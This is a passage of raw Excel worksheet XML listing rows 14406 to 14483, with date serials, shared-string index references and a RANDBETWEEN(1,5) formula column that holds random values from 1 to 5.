      </c>
      <c r="D14406" t="s">
        <v>494</v>
      </c>
      <c r="E14406" s="2" t="s">
        <v>12936</v>
      </c>
      <c r="F14406">
        <f t="shared" ca="1" si="225"/>
        <v>2</v>
      </c>
    </row>
    <row r="14407" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14407" s="1">
        <v>43242.609965277778</v>
      </c>
      <c r="C14407" t="s">
        <v>10</v>
      </c>
      <c r="D14407" t="s">
        <v>46</v>
      </c>
      <c r="E14407" t="s">
        <v>12937</v>
      </c>
      <c r="F14407">
        <f t="shared" ca="1" si="225"/>
        <v>5</v>
      </c>
    </row>
    <row r="14408" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14408" s="1">
        <v>43242.608217592591</v>
      </c>
      <c r="C14408" t="s">
        <v>260</v>
      </c>
      <c r="F14408">
        <f t="shared" ca="1" si="225"/>
        <v>4</v>
      </c>
    </row>
    <row r="14409" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14409" s="1">
        <v>43242.60670138889</v>
      </c>
      <c r="C14409" t="s">
        <v>10</v>
      </c>
      <c r="E14409" t="s">
        <v>12938</v>
      </c>
      <c r="F14409">
        <f t="shared" ca="1" si="225"/>
        <v>4</v>
      </c>
    </row>
    <row r="14410" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14410" s="1">
        <v>43242.603773148148</v>
      </c>
      <c r="C14410" t="s">
        <v>10</v>
      </c>
      <c r="D14410" t="s">
        <v>94</v>
      </c>
      <c r="E14410" t="s">
        <v>12939</v>
      </c>
      <c r="F14410">
        <f t="shared" ca="1" si="225"/>
        <v>3</v>
      </c>
    </row>
    <row r="14411" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14411" s="1">
        <v>43242.599490740744</v>
      </c>
      <c r="C14411" t="s">
        <v>10</v>
      </c>
      <c r="D14411" t="s">
        <v>52</v>
      </c>
      <c r="E14411" s="2" t="s">
        <v>12940</v>
      </c>
      <c r="F14411">
        <f t="shared" ca="1" si="225"/>
        <v>2</v>
      </c>
    </row>
    <row r="14412" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14412" s="1">
        <v>43242.59946759259</v>
      </c>
      <c r="C14412" t="s">
        <v>749</v>
      </c>
      <c r="D14412" t="s">
        <v>151</v>
      </c>
      <c r="E14412" s="2" t="s">
        <v>12941</v>
      </c>
      <c r="F14412">
        <f t="shared" ca="1" si="225"/>
        <v>4</v>
      </c>
    </row>
    <row r="14413" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A14413" s="1">
        <v>43242.562847222223</v>
      </c>
      <c r="C14413" t="s">
        <v>118</v>
      </c>
      <c r="D14413" t="s">
        <v>41</v>
      </c>
      <c r="E14413" s="2" t="s">
        <v>12942</v>
      </c>
      <c r="F14413">
        <f t="shared" ca="1" si="225"/>
        <v>3</v>
      </c>
    </row>
    <row r="14414" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14414" s="1">
        <v>43242.559328703705</v>
      </c>
      <c r="C14414" t="s">
        <v>10</v>
      </c>
      <c r="D14414" t="s">
        <v>36</v>
      </c>
      <c r="E14414" t="s">
        <v>12943</v>
      </c>
      <c r="F14414">
        <f t="shared" ca="1" si="225"/>
        <v>2</v>
      </c>
    </row>
    <row r="14415" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A14415" s="1">
        <v>43242.558067129627</v>
      </c>
      <c r="C14415" t="s">
        <v>6</v>
      </c>
      <c r="D14415" t="s">
        <v>25</v>
      </c>
      <c r="E14415" s="2" t="s">
        <v>12944</v>
      </c>
      <c r="F14415">
        <f t="shared" ca="1" si="225"/>
        <v>3</v>
      </c>
    </row>
    <row r="14416" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14416" s="1">
        <v>43242.553946759261</v>
      </c>
      <c r="C14416" t="s">
        <v>10</v>
      </c>
      <c r="D14416" t="s">
        <v>36</v>
      </c>
      <c r="E14416" t="s">
        <v>12945</v>
      </c>
      <c r="F14416">
        <f t="shared" ca="1" si="225"/>
        <v>2</v>
      </c>
    </row>
    <row r="14417" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A14417" s="1">
        <v>43242.550405092596</v>
      </c>
      <c r="C14417" t="s">
        <v>10</v>
      </c>
      <c r="D14417" t="s">
        <v>6</v>
      </c>
      <c r="E14417" s="2" t="s">
        <v>12946</v>
      </c>
      <c r="F14417">
        <f t="shared" ca="1" si="225"/>
        <v>2</v>
      </c>
    </row>
    <row r="14418" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14418" s="1">
        <v>43242.544490740744</v>
      </c>
      <c r="C14418" t="s">
        <v>10</v>
      </c>
      <c r="D14418" t="s">
        <v>17</v>
      </c>
      <c r="E14418" t="s">
        <v>12947</v>
      </c>
      <c r="F14418">
        <f t="shared" ca="1" si="225"/>
        <v>1</v>
      </c>
    </row>
    <row r="14419" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14419" s="1">
        <v>43242.543275462966</v>
      </c>
      <c r="C14419" t="s">
        <v>6</v>
      </c>
      <c r="D14419" t="s">
        <v>821</v>
      </c>
      <c r="E14419" t="s">
        <v>12948</v>
      </c>
      <c r="F14419">
        <f t="shared" ca="1" si="225"/>
        <v>4</v>
      </c>
    </row>
    <row r="14420" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A14420" s="1">
        <v>43242.471886574072</v>
      </c>
      <c r="C14420" t="s">
        <v>140</v>
      </c>
      <c r="D14420" t="s">
        <v>33</v>
      </c>
      <c r="E14420" s="2" t="s">
        <v>12949</v>
      </c>
      <c r="F14420">
        <f t="shared" ca="1" si="225"/>
        <v>3</v>
      </c>
    </row>
    <row r="14421" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A14421" s="1">
        <v>43242.471863425926</v>
      </c>
      <c r="C14421" t="s">
        <v>154</v>
      </c>
      <c r="D14421" t="s">
        <v>244</v>
      </c>
      <c r="E14421" s="2" t="s">
        <v>12950</v>
      </c>
      <c r="F14421">
        <f t="shared" ca="1" si="225"/>
        <v>1</v>
      </c>
    </row>
    <row r="14422" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14422" s="1">
        <v>43242.468182870369</v>
      </c>
      <c r="C14422" t="s">
        <v>10</v>
      </c>
      <c r="D14422" t="s">
        <v>80</v>
      </c>
      <c r="E14422" t="s">
        <v>12951</v>
      </c>
      <c r="F14422">
        <f t="shared" ca="1" si="225"/>
        <v>2</v>
      </c>
    </row>
    <row r="14423" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14423" s="1">
        <v>43242.466284722221</v>
      </c>
      <c r="C14423" t="s">
        <v>10</v>
      </c>
      <c r="D14423" t="s">
        <v>11</v>
      </c>
      <c r="E14423" s="2" t="s">
        <v>12952</v>
      </c>
      <c r="F14423">
        <f t="shared" ca="1" si="225"/>
        <v>3</v>
      </c>
    </row>
    <row r="14424" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A14424" s="1">
        <v>43242.456620370373</v>
      </c>
      <c r="C14424" t="s">
        <v>10</v>
      </c>
      <c r="D14424" t="s">
        <v>244</v>
      </c>
      <c r="E14424" s="2" t="s">
        <v>12953</v>
      </c>
      <c r="F14424">
        <f t="shared" ca="1" si="225"/>
        <v>5</v>
      </c>
    </row>
    <row r="14425" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14425" s="1">
        <v>43242.415150462963</v>
      </c>
      <c r="C14425" t="s">
        <v>48</v>
      </c>
      <c r="E14425" s="2" t="s">
        <v>12954</v>
      </c>
      <c r="F14425">
        <f t="shared" ca="1" si="225"/>
        <v>5</v>
      </c>
    </row>
    <row r="14426" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14426" s="1">
        <v>43242.392002314817</v>
      </c>
      <c r="C14426" t="s">
        <v>6</v>
      </c>
      <c r="D14426" t="s">
        <v>25</v>
      </c>
      <c r="E14426" s="2" t="s">
        <v>12955</v>
      </c>
      <c r="F14426">
        <f t="shared" ca="1" si="225"/>
        <v>1</v>
      </c>
    </row>
    <row r="14427" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14427" s="1">
        <v>43242.391215277778</v>
      </c>
      <c r="C14427" t="s">
        <v>173</v>
      </c>
      <c r="E14427" s="2" t="s">
        <v>12956</v>
      </c>
      <c r="F14427">
        <f t="shared" ca="1" si="225"/>
        <v>3</v>
      </c>
    </row>
    <row r="14428" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14428" s="1">
        <v>43242.343622685185</v>
      </c>
      <c r="C14428" t="s">
        <v>73</v>
      </c>
      <c r="E14428" t="s">
        <v>12957</v>
      </c>
      <c r="F14428">
        <f t="shared" ca="1" si="225"/>
        <v>1</v>
      </c>
    </row>
    <row r="14429" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14429" s="1">
        <v>43242.327731481484</v>
      </c>
      <c r="C14429" t="s">
        <v>1068</v>
      </c>
      <c r="D14429" t="s">
        <v>194</v>
      </c>
      <c r="E14429" s="2" t="s">
        <v>12958</v>
      </c>
      <c r="F14429">
        <f t="shared" ca="1" si="225"/>
        <v>3</v>
      </c>
    </row>
    <row r="14430" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14430" s="1">
        <v>43242.306990740741</v>
      </c>
      <c r="C14430" t="s">
        <v>339</v>
      </c>
      <c r="D14430" t="s">
        <v>312</v>
      </c>
      <c r="E14430" t="s">
        <v>12959</v>
      </c>
      <c r="F14430">
        <f t="shared" ca="1" si="225"/>
        <v>2</v>
      </c>
    </row>
    <row r="14431" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14431" s="1">
        <v>43242.30537037037</v>
      </c>
      <c r="C14431" t="s">
        <v>140</v>
      </c>
      <c r="D14431" t="s">
        <v>39</v>
      </c>
      <c r="E14431" s="2" t="s">
        <v>12960</v>
      </c>
      <c r="F14431">
        <f t="shared" ca="1" si="225"/>
        <v>3</v>
      </c>
    </row>
    <row r="14432" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A14432" s="1">
        <v>43242.301157407404</v>
      </c>
      <c r="C14432" t="s">
        <v>461</v>
      </c>
      <c r="E14432" s="2" t="s">
        <v>12961</v>
      </c>
      <c r="F14432">
        <f t="shared" ca="1" si="225"/>
        <v>1</v>
      </c>
    </row>
    <row r="14433" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14433" s="1">
        <v>43242.290462962963</v>
      </c>
      <c r="C14433" t="s">
        <v>17</v>
      </c>
      <c r="E14433" t="s">
        <v>12962</v>
      </c>
      <c r="F14433">
        <f t="shared" ca="1" si="225"/>
        <v>2</v>
      </c>
    </row>
    <row r="14434" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14434" s="1">
        <v>43242.284062500003</v>
      </c>
      <c r="C14434" t="s">
        <v>865</v>
      </c>
      <c r="E14434" t="s">
        <v>12963</v>
      </c>
      <c r="F14434">
        <f t="shared" ca="1" si="225"/>
        <v>1</v>
      </c>
    </row>
    <row r="14435" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14435" s="1">
        <v>43242.280833333331</v>
      </c>
      <c r="C14435" t="s">
        <v>430</v>
      </c>
      <c r="E14435" s="2" t="s">
        <v>12964</v>
      </c>
      <c r="F14435">
        <f t="shared" ca="1" si="225"/>
        <v>4</v>
      </c>
    </row>
    <row r="14436" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14436" s="1">
        <v>43242.280717592592</v>
      </c>
      <c r="C14436" t="s">
        <v>41</v>
      </c>
      <c r="E14436" t="s">
        <v>705</v>
      </c>
      <c r="F14436">
        <f t="shared" ca="1" si="225"/>
        <v>4</v>
      </c>
    </row>
    <row r="14437" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A14437" s="1">
        <v>43242.279780092591</v>
      </c>
      <c r="C14437" t="s">
        <v>71</v>
      </c>
      <c r="D14437" t="s">
        <v>312</v>
      </c>
      <c r="E14437" s="2" t="s">
        <v>12965</v>
      </c>
      <c r="F14437">
        <f t="shared" ca="1" si="225"/>
        <v>1</v>
      </c>
    </row>
    <row r="14438" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14438" s="1">
        <v>43242.269780092596</v>
      </c>
      <c r="C14438" t="s">
        <v>140</v>
      </c>
      <c r="D14438" t="s">
        <v>222</v>
      </c>
      <c r="E14438" s="2" t="s">
        <v>12966</v>
      </c>
      <c r="F14438">
        <f t="shared" ca="1" si="225"/>
        <v>1</v>
      </c>
    </row>
    <row r="14439" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A14439" s="1">
        <v>43242.247395833336</v>
      </c>
      <c r="C14439" t="s">
        <v>1080</v>
      </c>
      <c r="E14439" s="2" t="s">
        <v>12967</v>
      </c>
      <c r="F14439">
        <f t="shared" ca="1" si="225"/>
        <v>5</v>
      </c>
    </row>
    <row r="14440" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14440" s="1">
        <v>43242.24559027778</v>
      </c>
      <c r="C14440" t="s">
        <v>124</v>
      </c>
      <c r="E14440" s="2" t="s">
        <v>12968</v>
      </c>
      <c r="F14440">
        <f t="shared" ca="1" si="225"/>
        <v>1</v>
      </c>
    </row>
    <row r="14441" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14441" s="1">
        <v>43242.239525462966</v>
      </c>
      <c r="C14441" t="s">
        <v>63</v>
      </c>
      <c r="E14441" t="s">
        <v>12969</v>
      </c>
      <c r="F14441">
        <f t="shared" ca="1" si="225"/>
        <v>2</v>
      </c>
    </row>
    <row r="14442" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14442" s="1">
        <v>43242.229525462964</v>
      </c>
      <c r="C14442" t="s">
        <v>41</v>
      </c>
      <c r="E14442" t="s">
        <v>12970</v>
      </c>
      <c r="F14442">
        <f t="shared" ca="1" si="225"/>
        <v>2</v>
      </c>
    </row>
    <row r="14443" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14443" s="1">
        <v>43242.227951388886</v>
      </c>
      <c r="C14443" t="s">
        <v>63</v>
      </c>
      <c r="E14443" s="2" t="s">
        <v>12971</v>
      </c>
      <c r="F14443">
        <f t="shared" ca="1" si="225"/>
        <v>3</v>
      </c>
    </row>
    <row r="14444" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14444" s="1">
        <v>43242.226875</v>
      </c>
      <c r="C14444" t="s">
        <v>41</v>
      </c>
      <c r="E14444" t="s">
        <v>12972</v>
      </c>
      <c r="F14444">
        <f t="shared" ca="1" si="225"/>
        <v>5</v>
      </c>
    </row>
    <row r="14445" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A14445" s="1">
        <v>43242.213599537034</v>
      </c>
      <c r="C14445" t="s">
        <v>71</v>
      </c>
      <c r="E14445" s="2" t="s">
        <v>12973</v>
      </c>
      <c r="F14445">
        <f t="shared" ca="1" si="225"/>
        <v>4</v>
      </c>
    </row>
    <row r="14446" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14446" s="1">
        <v>43242.211388888885</v>
      </c>
      <c r="C14446" t="s">
        <v>301</v>
      </c>
      <c r="E14446" s="2" t="s">
        <v>12974</v>
      </c>
      <c r="F14446">
        <f t="shared" ca="1" si="225"/>
        <v>4</v>
      </c>
    </row>
    <row r="14447" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14447" s="1">
        <v>43242.211365740739</v>
      </c>
      <c r="C14447" t="s">
        <v>166</v>
      </c>
      <c r="E14447" s="2" t="s">
        <v>12975</v>
      </c>
      <c r="F14447">
        <f t="shared" ca="1" si="225"/>
        <v>2</v>
      </c>
    </row>
    <row r="14448" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A14448" s="1">
        <v>43242.198240740741</v>
      </c>
      <c r="C14448" t="s">
        <v>71</v>
      </c>
      <c r="E14448" s="2" t="s">
        <v>12976</v>
      </c>
      <c r="F14448">
        <f t="shared" ca="1" si="225"/>
        <v>1</v>
      </c>
    </row>
    <row r="14449" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14449" s="1">
        <v>43242.19667824074</v>
      </c>
      <c r="C14449" t="s">
        <v>71</v>
      </c>
      <c r="E14449" s="2" t="s">
        <v>12977</v>
      </c>
      <c r="F14449">
        <f t="shared" ca="1" si="225"/>
        <v>4</v>
      </c>
    </row>
    <row r="14450" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14450" s="1">
        <v>43242.174988425926</v>
      </c>
      <c r="C14450" t="s">
        <v>43</v>
      </c>
      <c r="E14450" t="s">
        <v>12978</v>
      </c>
      <c r="F14450">
        <f t="shared" ca="1" si="225"/>
        <v>5</v>
      </c>
    </row>
    <row r="14451" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14451" s="1">
        <v>43242.166701388887</v>
      </c>
      <c r="C14451" t="s">
        <v>140</v>
      </c>
      <c r="D14451" t="s">
        <v>56</v>
      </c>
      <c r="E14451" s="2" t="s">
        <v>12979</v>
      </c>
      <c r="F14451">
        <f t="shared" ca="1" si="225"/>
        <v>2</v>
      </c>
    </row>
    <row r="14452" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14452" s="1">
        <v>43242.162291666667</v>
      </c>
      <c r="C14452" t="s">
        <v>50</v>
      </c>
      <c r="E14452" s="2" t="s">
        <v>12980</v>
      </c>
      <c r="F14452">
        <f t="shared" ca="1" si="225"/>
        <v>1</v>
      </c>
    </row>
    <row r="14453" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14453" s="1">
        <v>43242.143101851849</v>
      </c>
      <c r="C14453" t="s">
        <v>173</v>
      </c>
      <c r="E14453" t="s">
        <v>12981</v>
      </c>
      <c r="F14453">
        <f t="shared" ca="1" si="225"/>
        <v>3</v>
      </c>
    </row>
    <row r="14454" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14454" s="1">
        <v>43242.059340277781</v>
      </c>
      <c r="C14454" t="s">
        <v>41</v>
      </c>
      <c r="E14454" t="s">
        <v>12982</v>
      </c>
      <c r="F14454">
        <f t="shared" ca="1" si="225"/>
        <v>5</v>
      </c>
    </row>
    <row r="14455" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14455" s="1">
        <v>43242.049166666664</v>
      </c>
      <c r="C14455" t="s">
        <v>140</v>
      </c>
      <c r="D14455" t="s">
        <v>1091</v>
      </c>
      <c r="E14455" s="2" t="s">
        <v>12983</v>
      </c>
      <c r="F14455">
        <f t="shared" ca="1" si="225"/>
        <v>2</v>
      </c>
    </row>
    <row r="14456" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14456" s="1">
        <v>43242.028865740744</v>
      </c>
      <c r="C14456" t="s">
        <v>140</v>
      </c>
      <c r="D14456" t="s">
        <v>885</v>
      </c>
      <c r="E14456" s="2" t="s">
        <v>12984</v>
      </c>
      <c r="F14456">
        <f t="shared" ca="1" si="225"/>
        <v>5</v>
      </c>
    </row>
    <row r="14457" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14457" s="1">
        <v>43242.024502314816</v>
      </c>
      <c r="C14457" t="s">
        <v>10</v>
      </c>
      <c r="D14457" t="s">
        <v>20</v>
      </c>
      <c r="E14457" s="2" t="s">
        <v>12985</v>
      </c>
      <c r="F14457">
        <f t="shared" ca="1" si="225"/>
        <v>5</v>
      </c>
    </row>
    <row r="14458" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14458" s="1">
        <v>43242.013680555552</v>
      </c>
      <c r="C14458" t="s">
        <v>140</v>
      </c>
      <c r="D14458" t="s">
        <v>229</v>
      </c>
      <c r="E14458" s="2" t="s">
        <v>12986</v>
      </c>
      <c r="F14458">
        <f t="shared" ca="1" si="225"/>
        <v>2</v>
      </c>
    </row>
    <row r="14459" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14459" s="1">
        <v>43241.919664351852</v>
      </c>
      <c r="C14459" t="s">
        <v>48</v>
      </c>
      <c r="E14459" s="2" t="s">
        <v>12987</v>
      </c>
      <c r="F14459">
        <f t="shared" ca="1" si="225"/>
        <v>2</v>
      </c>
    </row>
    <row r="14460" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A14460" s="1">
        <v>43241.911099537036</v>
      </c>
      <c r="C14460" t="s">
        <v>1077</v>
      </c>
      <c r="D14460" t="s">
        <v>1993</v>
      </c>
      <c r="E14460" s="2" t="s">
        <v>12988</v>
      </c>
      <c r="F14460">
        <f t="shared" ca="1" si="225"/>
        <v>5</v>
      </c>
    </row>
    <row r="14461" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A14461" s="1">
        <v>43241.911087962966</v>
      </c>
      <c r="C14461" t="s">
        <v>2733</v>
      </c>
      <c r="D14461" t="s">
        <v>263</v>
      </c>
      <c r="E14461" s="2" t="s">
        <v>12989</v>
      </c>
      <c r="F14461">
        <f t="shared" ca="1" si="225"/>
        <v>2</v>
      </c>
    </row>
    <row r="14462" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14462" s="1">
        <v>43241.910138888888</v>
      </c>
      <c r="C14462" t="s">
        <v>845</v>
      </c>
      <c r="E14462" t="s">
        <v>12990</v>
      </c>
      <c r="F14462">
        <f t="shared" ca="1" si="225"/>
        <v>1</v>
      </c>
    </row>
    <row r="14463" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A14463" s="1">
        <v>43241.869722222225</v>
      </c>
      <c r="C14463" t="s">
        <v>43</v>
      </c>
      <c r="D14463" t="s">
        <v>885</v>
      </c>
      <c r="E14463" s="2" t="s">
        <v>12991</v>
      </c>
      <c r="F14463">
        <f t="shared" ca="1" si="225"/>
        <v>3</v>
      </c>
    </row>
    <row r="14464" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A14464" s="1">
        <v>43241.869675925926</v>
      </c>
      <c r="C14464" t="s">
        <v>720</v>
      </c>
      <c r="D14464" t="s">
        <v>330</v>
      </c>
      <c r="E14464" s="2" t="s">
        <v>12992</v>
      </c>
      <c r="F14464">
        <f t="shared" ca="1" si="225"/>
        <v>3</v>
      </c>
    </row>
    <row r="14465" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14465" s="1">
        <v>43241.769965277781</v>
      </c>
      <c r="C14465" t="s">
        <v>10</v>
      </c>
      <c r="D14465" t="s">
        <v>6</v>
      </c>
      <c r="E14465" t="s">
        <v>6496</v>
      </c>
      <c r="F14465">
        <f t="shared" ca="1" si="225"/>
        <v>2</v>
      </c>
    </row>
    <row r="14466" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14466" s="1">
        <v>43241.76357638889</v>
      </c>
      <c r="C14466" t="s">
        <v>10</v>
      </c>
      <c r="D14466" t="s">
        <v>6</v>
      </c>
      <c r="E14466" t="s">
        <v>12993</v>
      </c>
      <c r="F14466">
        <f t="shared" ref="F14466:F14529" ca="1" si="226">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="14467" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14467" s="1">
        <v>43241.762916666667</v>
      </c>
      <c r="C14467" t="s">
        <v>10</v>
      </c>
      <c r="D14467" t="s">
        <v>23</v>
      </c>
      <c r="E14467" s="2" t="s">
        <v>12994</v>
      </c>
      <c r="F14467">
        <f t="shared" ca="1" si="226"/>
        <v>3</v>
      </c>
    </row>
    <row r="14468" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14468" s="1">
        <v>43241.762650462966</v>
      </c>
      <c r="C14468" t="s">
        <v>97</v>
      </c>
      <c r="D14468" t="s">
        <v>330</v>
      </c>
      <c r="E14468" s="2" t="s">
        <v>12995</v>
      </c>
      <c r="F14468">
        <f t="shared" ca="1" si="226"/>
        <v>2</v>
      </c>
    </row>
    <row r="14469" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14469" s="1">
        <v>43241.72792824074</v>
      </c>
      <c r="C14469" t="s">
        <v>10</v>
      </c>
      <c r="D14469" t="s">
        <v>107</v>
      </c>
      <c r="E14469" s="2" t="s">
        <v>12996</v>
      </c>
      <c r="F14469">
        <f t="shared" ca="1" si="226"/>
        <v>4</v>
      </c>
    </row>
    <row r="14470" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14470" s="1">
        <v>43241.69972222222</v>
      </c>
      <c r="C14470" t="s">
        <v>10</v>
      </c>
      <c r="D14470" t="s">
        <v>6</v>
      </c>
      <c r="E14470" t="s">
        <v>12997</v>
      </c>
      <c r="F14470">
        <f t="shared" ca="1" si="226"/>
        <v>4</v>
      </c>
    </row>
    <row r="14471" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14471" s="1">
        <v>43241.645138888889</v>
      </c>
      <c r="C14471" t="s">
        <v>10</v>
      </c>
      <c r="D14471" t="s">
        <v>381</v>
      </c>
      <c r="E14471" t="s">
        <v>12998</v>
      </c>
      <c r="F14471">
        <f t="shared" ca="1" si="226"/>
        <v>1</v>
      </c>
    </row>
    <row r="14472" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14472" s="1">
        <v>43241.631840277776</v>
      </c>
      <c r="C14472" t="s">
        <v>260</v>
      </c>
      <c r="E14472" t="s">
        <v>12999</v>
      </c>
      <c r="F14472">
        <f t="shared" ca="1" si="226"/>
        <v>2</v>
      </c>
    </row>
    <row r="14473" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14473" s="1">
        <v>43241.620173611111</v>
      </c>
      <c r="C14473" t="s">
        <v>10</v>
      </c>
      <c r="D14473" t="s">
        <v>20</v>
      </c>
      <c r="E14473" s="2" t="s">
        <v>13000</v>
      </c>
      <c r="F14473">
        <f t="shared" ca="1" si="226"/>
        <v>4</v>
      </c>
    </row>
    <row r="14474" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14474" s="1">
        <v>43241.615277777775</v>
      </c>
      <c r="C14474" t="s">
        <v>41</v>
      </c>
      <c r="E14474" s="2" t="s">
        <v>13001</v>
      </c>
      <c r="F14474">
        <f t="shared" ca="1" si="226"/>
        <v>5</v>
      </c>
    </row>
    <row r="14475" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14475" s="1">
        <v>43241.579062500001</v>
      </c>
      <c r="C14475" t="s">
        <v>10</v>
      </c>
      <c r="D14475" t="s">
        <v>89</v>
      </c>
      <c r="E14475" t="s">
        <v>13002</v>
      </c>
      <c r="F14475">
        <f t="shared" ca="1" si="226"/>
        <v>1</v>
      </c>
    </row>
    <row r="14476" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14476" s="1">
        <v>43241.575624999998</v>
      </c>
      <c r="C14476" t="s">
        <v>10</v>
      </c>
      <c r="D14476" t="s">
        <v>158</v>
      </c>
      <c r="E14476" t="s">
        <v>13003</v>
      </c>
      <c r="F14476">
        <f t="shared" ca="1" si="226"/>
        <v>2</v>
      </c>
    </row>
    <row r="14477" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14477" s="1">
        <v>43241.55740740741</v>
      </c>
      <c r="C14477" t="s">
        <v>10</v>
      </c>
      <c r="D14477" t="s">
        <v>52</v>
      </c>
      <c r="E14477" s="2" t="s">
        <v>13004</v>
      </c>
      <c r="F14477">
        <f t="shared" ca="1" si="226"/>
        <v>2</v>
      </c>
    </row>
    <row r="14478" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14478" s="1">
        <v>43241.538587962961</v>
      </c>
      <c r="C14478" t="s">
        <v>258</v>
      </c>
      <c r="D14478" t="s">
        <v>312</v>
      </c>
      <c r="E14478" s="2" t="s">
        <v>13005</v>
      </c>
      <c r="F14478">
        <f t="shared" ca="1" si="226"/>
        <v>5</v>
      </c>
    </row>
    <row r="14479" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14479" s="1">
        <v>43241.521747685183</v>
      </c>
      <c r="C14479" t="s">
        <v>41</v>
      </c>
      <c r="E14479" t="s">
        <v>13006</v>
      </c>
      <c r="F14479">
        <f t="shared" ca="1" si="226"/>
        <v>3</v>
      </c>
    </row>
    <row r="14480" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A14480" s="1">
        <v>43241.518865740742</v>
      </c>
      <c r="C14480" t="s">
        <v>229</v>
      </c>
      <c r="D14480" t="s">
        <v>25</v>
      </c>
      <c r="E14480" s="2" t="s">
        <v>13007</v>
      </c>
      <c r="F14480">
        <f t="shared" ca="1" si="226"/>
        <v>1</v>
      </c>
    </row>
    <row r="14481" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14481" s="1">
        <v>43241.516076388885</v>
      </c>
      <c r="C14481" t="s">
        <v>10</v>
      </c>
      <c r="D14481" t="s">
        <v>6</v>
      </c>
      <c r="E14481" s="2" t="s">
        <v>13008</v>
      </c>
      <c r="F14481">
        <f t="shared" ca="1" si="226"/>
        <v>4</v>
      </c>
    </row>
    <row r="14482" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14482" s="1">
        <v>43241.486527777779</v>
      </c>
      <c r="C14482" t="s">
        <v>10</v>
      </c>
      <c r="D14482" t="s">
        <v>14</v>
      </c>
      <c r="E14482" t="s">
        <v>13009</v>
      </c>
      <c r="F14482">
        <f t="shared" ca="1" si="226"/>
        <v>3</v>
      </c>
    </row>
    <row r="14483" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14483" s="1">
        <v>43241.481134259258</v>
      </c>
      <c r="C14483" t="s">
        <v>260</v>
      </c>
      <c r="E14483" t="s">
        <v>13010</v>
      </c>
      <c r="F14483">
        <f t="shared" ca="1" si="226"/>
        <v>1</v>
      </c>
    </row>
